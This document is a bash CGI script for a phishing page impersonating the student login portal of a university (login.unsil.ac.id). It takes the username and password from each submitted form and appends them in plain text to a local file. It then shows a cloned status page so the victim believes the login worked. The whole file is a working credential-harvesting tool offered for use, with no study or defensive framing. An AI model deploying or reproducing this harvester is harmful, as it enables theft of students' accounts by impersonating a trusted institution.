#====================================#
#------- PORTAL STUDENT@UNSIL -------#
#====================================#

#!/usr/bin/env bash

echo "Content-Type: text/html"
echo ""

# Ambil seluruh body POST
DATA=$(cat)

# Tangkap username dan password
USERNAME=$(echo "$DATA" | sed -n 's/.*username=//p' | sed 's/&.*//')
PASSWORD=$(echo "$DATA" | sed -n 's/.*password=//p')

# Format untuk disimpan
GABUNG="USER=$USERNAME PASS=$PASSWORD"

# Simpan ke file
sudo echo "$GABUNG" >> user-password.txt

# Delay sebelum menampilkan halaman
sleep 2.5

# OUTPUT HTML PERSIS SEPERTI HALAMAN UNSIL
cat <<EOF
<!DOCTYPE html>
<!-- saved from url=(0032)https://login.unsil.ac.id/status -->
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <title>Sineta | Status</title>
    <!-- Themes -->
    <meta name="theme-color" content="#FFF" id="themeColor">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="https://login.unsil.ac.id/favicon.ico" id="favicon">
    <!-- General CSS -->
    <link rel="stylesheet" type="text/css" href="./Sineta _ Status_files/main.css">
    <!-- Bootstrap Icons -->
    <link rel="stylesheet" href="./Sineta _ Status_files/bootstrap-icons.min.css">
    <!-- Utlilites CSS -->
    <link rel="stylesheet" type="text/css" href="./Sineta _ Status_files/utilities.css">
</head>


<body>
    <div class="d-flex flex-column flex-lg-row h-lg-full bg-surface-secondary">
        <nav class="navbar show navbar-vertical h-lg-screen navbar-expand-lg px-0 py-3 navbar-light bg-white border-bottom border-bottom-lg-0 border-end-lg"
            id="navbarVertical">
            <div class="container-fluid">
                <button class="navbar-toggler ms-n2 collapsed" type="button" data-bs-toggle="collapse"
                    data-bs-target="#sidebarCollapse" aria-controls="sidebarCollapse" aria-expanded="false"
                    aria-label="Toggle navigation">
                    <span class="navbar-toggler-icon">
                    </span>
                </button>
                <a class="navbar-brand py-lg-2 mb-lg-5 px-lg-6 me-0" href="https://login.unsil.ac.id/status.html">

                    <img src="./Sineta _ Status_files/logo-unsil.svg" alt="..." class="logocolor">
                </a>
                <div class="navbar-user d-lg-none">
                    <div class="dropdown">
                        <a href="https://login.unsil.ac.id/status#" id="sidebarAvatar" role="button"
                            data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                            <div class="avatar-parent-child">
                                <img alt="Image Placeholder" src="./Sineta _ Status_files/avatar-owner.png"
                                    class="avatar avatar- rounded-circle">
                                <span class="avatar-child avatar-badge bg-success"></span>
                            </div>
                        </a>
                        <div class="dropdown-menu dropdown-menu-end" aria-labelledby="sidebarAvatar">
                            <!-- <a href="profile.html" class="dropdown-item">Profile</a> -->
                            <!-- <hr class="dropdown-divider"> -->
                            <a href="https://login.unsil.ac.id/status#" class="dropdown-item" data-bs-toggle="modal"
                                data-bs-target="#logoutModal">Logout</a>
                        </div>
                    </div>
                </div>
                <div class="navbar-collapse collapse" id="sidebarCollapse">
                    <ul class="navbar-nav">
                        <li class="nav-item">
                            <a class="nav-link active" href="https://login.unsil.ac.id/status#">
                                <i class="bi bi-bar-chart-fill"></i>
                                Status
                            </a>
                        </li>
                        <!-- <li class="nav-item">
                            <a class="nav-link" href="voucher.html">
                                <i class="bi bi-ticket-perforated-fill"></i>
                                Voucher Package
                            </a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link" target="_blank"
                                href="https://www.google.com/search?q=internet+speed+test&oq=internet+speed+test&gs_lcrp=EgZjaHJvbWUyDwgAEEUYORiDARixAxiABDIHCAEQABiABDIHCAIQABiABDIHCAMQABiABDIHCAQQABiABDIGCAUQBRhAMgYIBhBFGDwyBggHEEUYPNIBCDEzMjVqMGo5qAIAsAIB&sourceid=chrome&ie=UTF-8">
                                <i class="bi bi-speedometer"></i>
                                Speedtest
                            </a>
                        </li> -->
                        <li class="nav-item">
                            <a class="nav-link" href="https://login.unsil.ac.id/services.html">
                                <i class="bi bi-person-fill-gear"></i>
                                Quick Access
                            </a>
                        </li>
                    </ul>
                    <!-- <hr class="navbar-divider my-5 opacity-70">
                    <ul class="navbar-nav">
                        <li>
                            <span class="nav-link text-xs font-semibold text-uppercase text-muted ls-wide">Information
                            </span>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link" href="contact.html">
                                <i class="bi bi-telephone"></i>
                                Contact us
                            </a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link py-2 d-flex align-items-center" href="#" target="_blank">
                                <i class="bi bi-journals"></i>
                                <span>Changelog</span>
                                <span
                                    class="badge badge-sm bg-soft-dark text-dark rounded-pill ms-auto">v1.0.0</span></a>
                        </li>
                    </ul> -->
                </div>
            </div>
        </nav>
        <div class="h-screen flex-grow-1 overflow-y-lg-auto">
            <header class="bg-surface-primary border-bottom py-6">
                <div class="container-fluid">
                    <div class="mb-npx">
                        <div class="row align-items-center">
                            <div class="col-sm-6 col-12 mb-4 mb-sm-0">
                                <small>Hi, $USERNAME</small>
                                <h1 class="h2 ls-tight" id="greeting">Selamat Siang 👋</h1>
                            </div>
                            <div class="col-sm-6 col-12 text-sm-end d-inline-block d-lg-block d-none">
                                <div class="hstack gap-2 justify-content-end">
                                    <a href="https://login.unsil.ac.id/status#" class="btn btn-sm btn-dark"
                                        data-bs-toggle="modal" data-bs-target="#logoutModal">
                                        <span class="pe-2">
                                            <i class="bi bi-box-arrow-left"></i>
                                        </span>
                                        <span>Logout</span>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </header>

            <!-- Modal logout -->
            <div class="modal" id="logoutModal" tabindex="-1" aria-labelledby="logoutModalLabel" aria-hidden="true">
                <div class="modal-dialog">
                    <div class="modal-content shadow-3">
                        <div class="modal-body p-4">
                            <div class="text-center">
                                <div class="icon icon-shape bg-soft-tertiary text-tertiary text-lg rounded-circle mb-5">
                                    <i class="bi bi-exclamation-circle-fill"></i>
                                </div>
                                <h4>Are you sure you want to come out?</h4>
                                <small class="text-muted">Your action will clear your current login session
                                    This is</small>
                            </div>
                        </div>
                        <div class="modal-footer p-2">
                            <button type="button" class="btn btn-sm btn-neutral" data-bs-dismiss="modal">Close</button>
                            <a href="https://login.unsil.ac.id/logout.html?erase-cookie=true" type="button"
                                class="btn btn-sm btn-danger">Sure</a>
                        </div>
                    </div>
                </div>
            </div>

            <main class="py-6 bg-surface-secondary">
                <div class="container-fluid vstack gap-6">
                    <div class="row g-6">
                        <div>
                            <h5>login.unsil.ac.id/status</h5>
                            <p class="text-sm text-muted mt-1"><i
                                    class="bi bi-check-circle-fill text-success me-2"></i><span
                                    class="text-success">Running</span>・Connected in 3s
                            </p>
                        </div>
                        <div class="col-xl-3 col-sm-6 col-12">
                            <div class="card">
                                <div class="card-body">
                                    <div class="row">
                                        <div class="col">
                                            <span class="h6 font-semibold text-muted text-sm d-block mb-2">Upload</span>
                                            <span class="h3 font-bold mb-0">59.7 KiB</span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col-xl-3 col-sm-6 col-12">
                            <div class="card">
                                <div class="card-body">
                                    <div class="row">
                                        <div class="col">
                                            <span
                                                class="h6 font-semibold text-muted text-sm d-block mb-2">Download</span>
                                            <span class="h3 font-bold mb-0">32.8 KiB</span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col-xl-3 col-sm-6 col-12">
                            <div class="card">
                                <div class="card-body">
                                    <div class="row">
                                        <div class="col">
                                            <span class="h6 font-semibold text-muted text-sm d-block mb-2">IP
                                                Adress</span>
                                            <span class="h3 font-bold mb-0">20.17.1.66</span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col-xl-3 col-sm-6 col-12">
                            <div class="card">
                                <div class="card-body">
                                    <div class="row">
                                        <div class="col">
                                            <span class="h6 font-semibold text-muted text-sm d-block mb-2">Status
                                                refresh</span>
                                            <span class="h3 font-bold mb-0">15m</span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="row g-6">
                        <div class="col-xl-12">
                            <div class="card">
                                <div class="card-header">
                                    <div class="d-flex align-items-center">
                                        <h5 class="mb-0">Network Information</h5>
                                    </div>
                                </div>
                                <div class="card-body py-0 position-relative">
                                    <div class="row">
                                        <div class="col-lg-6 col-md-12">
                                            <div class="list-group list-group-flush">
                                              
                                                <div class="list-group-item px-0 position-relative hstack flex-wrap">
                                                    <div class="me-3 text-heading">
                                                        <div class="position-relative d-inline-block">
                                                            <div class="border border-gray-600 border-1 rounded-circle d-flex align-items-center justify-content-center"
                                                                style="width: 32px; height: 32px;">
                                                                <i class="bi bi-terminal"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-1">
                                                        <div class="d-flex align-items-center mb-1">
                                                            <span class="d-block h6 stretched-link">
                                                                IP Address
                                                            </span>
                                                            <div class="text-sm text-muted line-clamp-1 ms-auto">
                                                                20.17.1.66
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="list-group-item px-0 position-relative hstack flex-wrap">
                                                    <div class="me-3 text-heading">
                                                        <div class="position-relative d-inline-block">
                                                            <div class="border border-gray-600 border-1 rounded-circle d-flex align-items-center justify-content-center"
                                                                style="width: 32px; height: 32px;">
                                                                <i class="bi bi-file-lock2"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-1">
                                                        <div class="d-flex align-items-center mb-1">
                                                            <span class="d-block h6 stretched-link">
                                                                MAC Address
                                                            </span>
                                                            <div class="text-sm text-muted line-clamp-1 ms-auto">
                                                                1A:68:C9:B1:6D:BF
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>

                                            </div>
                                        </div>
                                        <div class="col-lg-6 col-md-12">
                                            <div class="list-group list-group-flush">
                                                <!--                                                  -->
                                                <div class="list-group-item px-0 position-relative hstack flex-wrap">
                                                    <div class="me-3 text-heading">
                                                        <div class="position-relative d-inline-block">
                                                            <div class="border border-gray-600 border-1 rounded-circle d-flex align-items-center justify-content-center"
                                                                style="width: 32px; height: 32px;">
                                                                <i class="bi bi-clock"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-1">
                                                        <div class="d-flex align-items-center mb-1">
                                                            <span class="d-block h6 stretched-link">
                                                                Connected
                                                            </span>
                                                            <div class="text-sm text-muted line-clamp-1 ms-auto">
                                                                3s
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="list-group-item px-0 position-relative hstack flex-wrap">
                                                    <div class="me-3 text-heading">
                                                        <div class="position-relative d-inline-block">
                                                            <div class="border border-gray-600 border-1 rounded-circle d-flex align-items-center justify-content-center"
                                                                style="width: 32px; height: 32px;">
                                                                <i class="bi bi-arrow-clockwise"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-1">
                                                        <div class="d-flex align-items-center mb-1">
                                                            <span class="d-block h6 stretched-link">
                                                                Status refresh
                                                            </span>
                                                            <div class="text-sm text-muted line-clamp-1 ms-auto">
                                                                15m
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <!-- <div class="list-group-item px-0 position-relative hstack flex-wrap">
                                                    <div class="me-3 text-heading">
                                                        <div class="position-relative d-inline-block">
                                                            <div class="border border-gray-600 border-1 rounded-circle d-flex align-items-center justify-content-center"
                                                                style="width: 32px; height: 32px;">
                                                                <i class="bi bi-globe"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-1">
                                                        <div class="d-flex align-items-center mb-1">
                                                            <span class="d-block h6 stretched-link">
                                                                DNS
                                                            </span>
                                                            <div class="text-sm text-muted line-clamp-1 ms-auto">
                                                                login.unsil.ac.id
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div> -->
                                            </div>
                                        </div>
                                    </div>

                                </div>
                            </div>
                        </div>
                        <div class="text-left my-8 small">
                            <div class="sm-ft mb-3">
                                Copyright © <span id="current-year">2025</span> UPA TIK ☕
                            </div>

                            <script>
                                document.getElementById("current-year").textContent = new Date().getFullYear();
                            </script>
                        </div>
                    </div>

                </div>

            </main>
        </div>
    </div>
    <!-- Library -->
    <script src="./Sineta _ Status_files/jquery-3.7.1.js.download"></script>
    <!-- General JS -->
    <script src="./Sineta _ Status_files/main.js.download"></script>
    <script src="./Sineta _ Status_files/app.js.download"></script>


</body>

</html>
EOF
